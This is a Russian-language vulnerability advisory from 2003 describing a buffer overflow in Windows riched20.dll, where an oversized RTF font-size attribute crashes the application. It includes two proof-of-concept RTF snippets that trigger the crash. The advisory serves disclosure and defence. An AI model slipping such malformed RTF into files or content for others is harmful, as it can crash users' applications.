Удаленное переполнение буфера в Microsoft Windows

Дата публикации:
21.02.2003
Всего просмотров:
1000
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в Windows 'riched20.dll'. Удаленный пользователь может аварийно завершить работу приложения.

Security Defence Stdio сообщил, что переполнение может быть вызвано специально обработанными атрибутами в RTF файле, когда DLL рисует figure-string ('\fs'). Когда (\fs) устанавливает размер шрифта превышающий 1024 байт, произойдет переполнение буфера. Другие атрибуты могут быть также уязвимы. Пример:

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset1 34 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
и еще один:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
\fs180 www.yoursft.com\fs20\par
}
Согласно сообщению, использование уязвимости для выполнения произвольного кода трудно реализуемо.

Уязвимость обнаружена в Microsoft Windows Microsoft Windows

Ссылки: Riched20.DLL attribute label buffer overflow vulnerability

или введите имя

CAPTCHA